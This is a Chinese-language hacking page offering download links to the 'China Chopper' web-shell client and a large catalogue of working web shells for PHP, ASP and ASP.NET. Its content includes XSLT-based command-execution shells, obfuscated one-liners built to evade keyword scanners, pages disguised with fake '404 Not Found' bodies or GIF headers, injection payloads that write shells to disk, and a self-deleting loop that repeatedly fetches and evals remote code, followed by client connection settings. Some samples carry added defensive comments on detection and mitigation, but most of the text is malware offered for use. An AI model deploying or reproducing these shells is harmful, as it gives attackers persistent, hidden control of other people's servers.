最新中国菜刀下载,免杀菜刀一句话大全.
中国菜刀下载,基于原版中国菜刀优化版20160309.
下载地址:
http://download.csdn.net/detail/settoken/9457567
http://pan.baidu.com/s/1jHoJxHW
China chopper
http://pan.baidu.com/s/1eRxEYjC
Asp
<%set xmldoc= Server.CreateObject("MSXML2.DOMDocument")
' Analysis note (defensive): this page runs an operating-system command through XSLT scripting.
' The text of the <root> element below is the command line handed to the stylesheet.
xml="<?xml version=""1.0""?><root >cmd /c dir</root>"
xmldoc.loadxml(xml)
Set xsldoc = Server.CreateObject("MSXML2.DOMDocument")
' The msxsl:script block defines a JScript function that creates WScript.Shell, executes the
' string it is given, and returns the process's stdout and stderr as the transform result.
xlst="<?xml version='1.0'?><xsl:stylesheet version=""1.0"" xmlns:xsl=""http://www.w3.org/1999/XSL/Transform"" xmlns:msxsl=""urn:schemas-microsoft-com:xslt"" xmlns:zcg=""zcgonvh""><msxsl:script language=""JScript"" implements-prefix=""zcg""> function xml(x) {var a=new ActiveXObject('wscript.shell'); var exec=a.Exec(x);return exec.StdOut.ReadAll()+exec.StdErr.ReadAll(); }</msxsl:script><xsl:template match=""/root""> <xsl:value-of select=""zcg:xml(string(.))""/></xsl:template></xsl:stylesheet>"
xsldoc.loadxml(xlst)
' Detection: the IIS worker process (w3wp.exe) spawning cmd.exe or another shell; files under the
' web root that combine msxsl:script with ActiveXObject or WScript.Shell; unexpected new .asp files.
' Mitigation: MSXML 6.0 ships with stylesheet scripting off (AllowXsltScript defaults to False); the
' version-independent ProgID used here typically resolves to MSXML 3.0, where script is allowed.
' Keep the web root non-writable for the application identity and monitor it for file changes.
response.write "<pre><xmp>" & xmldoc.TransformNode(xsldoc)& "</xmp></pre>"
%>
Php
<?php
// Analysis note (defensive): web shell that reaches assert() indirectly through the XSL extension,
// so the dangerous call is made by the XSLT engine rather than by a visible PHP call site.
// The <root> text is PHP source that reads the POST field "a".
$xml='<root>assert($_POST[a]);</root>';
$xsl='<?xml version="1.0" encoding="UTF-8"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:zcg="http://php.net/xsl">
<xsl:template match="/root">
<xsl:value-of select="zcg:function(\'assert\',string(.))"/>
</xsl:template>
</xsl:stylesheet>';
$xmldoc = DOMDocument::loadXML($xml);
$xsldoc = DOMDocument::loadXML($xsl);
$proc = new XSLTProcessor();
// registerPHPFunctions() with no argument exposes every PHP function to the stylesheet.
// Legitimate code should pass an explicit allow-list of function names instead.
$proc->registerPHPFunctions();
$proc->importStyleSheet($xsldoc);
// Mitigation: string evaluation by assert() was deprecated in PHP 7.2 and removed in PHP 8.0;
// on PHP 7, zend.assertions=-1 in production keeps assert() from evaluating anything.
// Detection: registerPHPFunctions() in files that also reference the http://php.net/xsl namespace
// with function names such as assert inside a stylesheet string.
$proc->transformToXML($xmldoc);
?>
Aspx
<%@page language="C#"%>
<%@ import Namespace="System.IO"%>
<%@ import Namespace="System.Xml"%>
<%@ import Namespace="System.Xml.Xsl"%>
<%
// Analysis note (defensive): ASP.NET web shell that executes request-supplied code from inside an
// XSLT script block. The XML input below is a dummy; all behaviour is in the stylesheet string.
string xml=@"<?xml version=""1.0""?><root>test</root>";
// The stylesheet's msxsl:script (JScript) obtains HttpContext.Current and passes the request
// item 'a' to eval(..., 'unsafe'), then ends the response.
string xslt=@"<?xml version='1.0'?>
<xsl:stylesheet version=""1.0"" xmlns:xsl=""http://www.w3.org/1999/XSL/Transform"" xmlns:msxsl=""urn:schemas-microsoft-com:xslt"" xmlns:zcg=""zcgonvh"">
<msxsl:script language=""JScript"" implements-prefix=""zcg"">
<msxsl:assembly name=""mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089""/>
<msxsl:assembly name=""System.Data, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089""/>
<msxsl:assembly name=""System.Configuration, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a""/>
<msxsl:assembly name=""System.Web, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a""/>
<![CDATA[function xml() {var c=System.Web.HttpContext.Current;var Request=c.Request;var Response=c.Response;var Server=c.Server;eval(Request.Item['a'],'unsafe');Response.End();}]]>
</msxsl:script>
<xsl:template match=""/root"">
<xsl:value-of select=""zcg:xml()""/>
</xsl:template>
</xsl:stylesheet>";
XmlDocument xmldoc=new XmlDocument();
xmldoc.LoadXml(xml);
XmlDocument xsldoc=new XmlDocument();
xsldoc.LoadXml(xslt);
XslCompiledTransform xct=new XslCompiledTransform();
// XsltSettings.TrustedXslt enables both embedded script and the document() function.
// XsltSettings.Default leaves both disabled and is what legitimate code should use for any
// stylesheet it does not fully control.
xct.Load(xsldoc,XsltSettings.TrustedXslt,new XmlUrlResolver());
// The output stream is discarded: the transform is run only for the script's side effect.
// Detection: .aspx files under the web root that pair XsltSettings.TrustedXslt (or EnableScript)
// with msxsl:script and eval on a Request value. Request.Item also reads form fields and
// cookies, so URL-only access logs will not show the payload; log or inspect request bodies.
xct.Transform(xmldoc,null,new MemoryStream());
%>
一句话:
PHP: <?php @eval($_POST['settoken']);?>
ASP: <%eval request("settoken")%>
ASP.NET: <%@ Page Language="Jscript"%><%eval(Request.Item["settoken"],"unsafe");%>
******************************************
<?php eval(base64_decode($_POST[index]))?>
<O>index=ZXZhbCgkX1BPU1RbMF0pOw==</O>
0
<?php fputs(fopen('./settoken.php','w+'),'<?php eval(base64_decode($_POST[index]))?>');?>
<?php
// Analysis note (defensive): keyword-evasion sample. No dangerous function name appears literally;
// each one is rebuilt at runtime by stripping filler characters from a padded string.
// $sme/$wd/$ova/$axc are fragments of one base64 string padded with the letter "r".
$sme="JrGluZm89rJF9QT1NUW2r9w";
$wd="ZW5pbmZvXTrtlY2hvIGVr";
$ova="2YWwoJGlrurZm8pO2Vr";
// Removing "ej" yields str_replace, which is then used to unpad the remaining strings.
$xul = str_replace("ej","","stejrej_ejrejeejplaejceje");
$axc="jraG8grIjQwNCBOb3QgRm91bmQiOw==";
// Removing "z" yields base64_decode; removing "h" yields create_function.
$ay = $xul("z", "", "zbzazszez64z_zdzecozde");
$ao = $xul("h","","hchrehahtheh_hfuhnhchthihohn");
// The decoded payload appears to eval a POST field and then print a fake "404 Not Found" message.
// Detection: signature scans for literal eval/base64_decode miss this; look instead for variable
// function calls ($name(...)) fed by str_replace on string literals, and for responses whose body
// says 404 while the HTTP status is 200. create_function() was removed in PHP 8.0.
$tik = $ao('', $ay($xul("r", "", $sme.$wd.$ova.$axc))); $tik();
$=$=openinfo
?>
<?php
// Analysis note (defensive): keyword-evasion sample. range(1,200) is used as a lookup table so that
// chr($webscan[n]) produces character n+1; the six chr() calls spell "assert".
$webscan=range(1,200);$webscan360=chr($webscan[96]).chr($webscan[114]).chr($webscan[114]).chr($webscan[100]).chr($webscan[113]).chr($webscan[115]);
// The variable-variable ${...} spells "_POST", so the call is assert() on a POST field.
// Detection: flag ${chr(...)} variable-variables and variable function calls whose argument is a
// request superglobal. String evaluation by assert() was removed in PHP 8.0.
$webscan360(${chr($webscan[94]).chr($webscan[79]).chr($webscan[78]).chr($webscan[82]).chr($webscan[83])}[chr($webscan[51])]);
$=$=4
?>
<?php $info=$_POST[info];echo eval($info);echo "404 Not Found"; ?>
<?php @preg_replace("//e",$_POST["Access"],"Access Denied"); ?>
<?php $K=sTr_RepLaCe('`','','a`s`s`e`r`t');$M=$_POST[index];IF($M==NuLl)HeaDeR('Status:404');Else/**/$K($M);?>
<?php preg_replace("/^/e",base64_decode($_REQUEST[page]),0); ?>
settoken.php?page=ZXZhbChiYXNlNjRfZGVjb2RlKCRfUkVRVUVTVFt6MF0pKQ==
<?php fputs(fopen(base64_decode("bG9ncy5waHA="), "w"), base64_decode("PD9waHAgQGV2YWwoJF9QT1NUWyd0aGlzX2lzX3lpanVodWEnXSk7Pz4="));?>
logs.php
this_is_yijuhua
<?php
$str = 'aerst';
$funct = $str{0}.$str{3}.$str{3}.$str{1}.$str{2}.$str{4};
@$func($_POST['funC']);
?>
<script language="php">@eval($_POST['p'.'h'.'p'])</script>
<?php
$func=pack("c6",97,115,115,101,114,116);
$_POST['c']=base64_decode( $_POST['c']) ;
$func($_POST['404']);
?>
<?php
echo "404 Not Found.";
$__Chr__ = $_POST['echo_Chr_Get']; if ($__Chr__!="") { $echo_Chr_Get__=base64_decode($_POST['z0']); @eval("\$echo = $echo_Chr_Get__;"); } ?>
<?php
// Analysis note (defensive): prints a fake "404 Not Found." body so the page looks missing to a
// casual visitor, then rebuilds a function name and a superglobal name from chr() lookups.
echo "404 Not Found.";
// range(1,200) is a lookup table: chr($Temp[n]) produces character n+1; the six calls spell "assert".
$Temp=range(1,200);$Log=chr($Temp[96]).chr($Temp[114]).chr($Temp[114]).chr($Temp[100]).chr($Temp[113]).chr($Temp[115]);
// ${...} spells "_POST". Detection: a 200 response whose body claims 404, combined with
// ${chr(...)} variable-variables and a variable function call on request data.
$Log(${chr($Temp[94]).chr($Temp[79]).chr($Temp[78]).chr($Temp[82]).chr($Temp[83])}[chr($Temp[114])]);
$=$=s
?>
<?php
// Analysis note (defensive): code-injection pattern. The "arg" query-string value is interpolated
// into a string that is passed to eval(), so any PHP expression in the URL is executed.
$var = "var";
if (isset($_GET["arg"]))
{
$arg = $_GET["arg"];
// eval() is a language construct, not a function: disable_functions in php.ini cannot block it.
// The fix is to remove the eval entirely and parse the expected value with a strict validator.
eval("\$var = $arg;");
// Detection: access-log entries where a query parameter contains PHP call syntax such as
// parentheses, quotes, or function names like fopen/phpinfo.
echo "\$var =".$var;
}
?>
?arg=phpinfo()
?arg=fputs(fopen('page.php','w+'),'<?php%20eval($_POST[page])?>')
<?php
// Analysis note (defensive): unrestricted file download. The "path" query-string value is used
// unvalidated both in the Content-Disposition header and as the argument to readfile().
header("Content-Type: application/octet-stream");
header("Content-Disposition: attachment; filename=".$_GET['path']);
// Any file readable by the web-server account is returned as raw bytes, including PHP source and
// configuration files that would normally be executed rather than served.
// Mitigation: resolve the requested name against a fixed directory and an allow-list, set
// open_basedir, and keep credentials out of files the web user can read.
// Detection: requests whose parameter names a .php/.ini/.conf file or contains "../" sequences.
readfile($_GET['path']);
?>
?path=config.php
<?php include 'log.log';?>
<!--#include file="log.log"-->
file_put_contents('log.php','<?php eval($_POST[page])?>'); eval.txt
<?php
// Analysis note (defensive): fileless persistence pattern. The script deletes its own file, then
// keeps running inside the PHP worker and repeatedly executes code fetched over HTTP.
unlink($_SERVER['SCRIPT_FILENAME']);
// Keep running after the client disconnects and lift the execution time limit.
ignore_user_abort(true);
set_time_limit(0);
$remote_file = 'http://localhost:8080/eval.txt';
// Loop: fetch the remote file, eval it, wait five seconds; ends when the fetch returns nothing.
// Detection: file scans of the web root find nothing once this is running. Look for PHP worker
// processes that never finish a request and for outbound HTTP from the web server at a fixed
// interval. Restarting the PHP service ends the loop.
// Mitigation: allow_url_fopen=Off where remote fetches are not needed, and egress filtering so
// the web tier cannot open arbitrary outbound connections.
while($code = file_get_contents($remote_file)){
@eval($code);
sleep(5);
};
?>
******************************************
<%eval e%>
<%e=request(page)%>
<!--#include file="settoken.asp"-->
<%MYTEST=REquEst("page"):EvaL(MYTEST)%>
<%eval (eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("sz"))%>
<%Y=request("x")%> <%execute(Y)%>
<!-- Page++ -->
<%
dim x1,x2
x1 = request("page")
x2 = x1
eval x2
%>
<!-- Page++ -->
<%configconfigconfig=REqUEsT(chr(97))%>
<%eVAL configconfigconfig%>
gif89a;gifok<%Page=request("index")%><%eval Page%>gif89a;
数据库:
A) 数据库方面:
-----------------------------------------------------------------------------
PHP脚本:
<T>MYSQL</T> 类型可为MYSQL,MSSQL,ORACLE,INFOMIX中的一种
<H>localhost<H> 主机地址可为机器名或IP地址,如localhost
<U>root</U> 连接数据库的用户名,如root
<P>settoken</P> 连接数据库的密码,如12345
<L>utf8</L> 这一项数据库类型为MYSQL脚本为PHP时可选,不填则为latin1
ASP和ASP.NET脚本:
<T>类型</T> 类型只能填ADO
<C>ADO配置信息</C>
ADO连接各种数据库的方式不一样。如MSSQL的配置信息为
Driver={Sql Server};Server=(local);Database=master;Uid=sa;Pwd=settoken;
同时,支持NT验证登录MSSQL数据库,并能把查询的结果列表导出为html文件
Customize 脚本:
<T>类型</T> 类型只能填XDB
<X>与Customize 脚本约定的配置信息</X>
菜刀自带的Customize.jsp数据库参数填写方法如下(两行):
MSSQL:
<X>
com.microsoft.sqlserver.jdbc.SQLServerDriver
jdbc:sqlserver://127.0.0.1:1433;databaseName=test;user=sa;password=settoken
</X>
MYSQL:
<X>
com.mysql.jdbc.Driver
jdbc:mysql://localhost/test?user=root&password=settoken
</X>
ORACLE:
<X>
oracle.jdbc.driver.OracleDriver
jdbc:oracle:thin:user/password@127.0.0.1:1521/test
</X>
B) 其它方面:
-----------------------------------------------------------------------------
添加额外附加提交的数据,如ASP的新服务端是这样的:
<%
' Analysis note (defensive): this ASP page loads request-supplied VBScript into a ScriptControl
' object and runs it, passing the ASP intrinsic objects to the injected function.
Set o = Server.CreateObject("ScriptControl")
o.language = "vbscript"
' The "SC" request value is added as source code without any validation.
o.addcode(Request("SC"))
' Detection: ASP files that create ScriptControl and call addcode on a Request value; requests
' whose parameters carry VBScript function definitions. Classic ASP applications rarely need
' ScriptControl, so its presence under a web root is worth reviewing.
o.run "ff",Server,Response,Request,Application,Session,Error
%>
那么,菜刀在配置处填入:
<O>SC=function+ff(Server,Response,Request,Application,Session,Error):eval(request("pass")):end+function</O>
然后以密码pass来连接即可。
提交功能前先POST额外的数据包:会话期间只提交一次。
<POST>https://zhongguocaidao/cgi-bin/login.cgi</POST>
<DATA>uid=user1&pwd=123456</DATA>
默认终端程序路径设置示例:
<SHELL>/bin/sh</SHELL>
虚拟终端默认命令设置示例:
<CMD>whoami</CMD>
文件管理默认打开的目录设置示例:
<CD>c:\windows\temp\</CD>
3) HTTP登录验证
SHELL地址这样填 http://user:pass@maicaidao.com/server.asp
用户名密码中的特殊字符可用URL编码转换.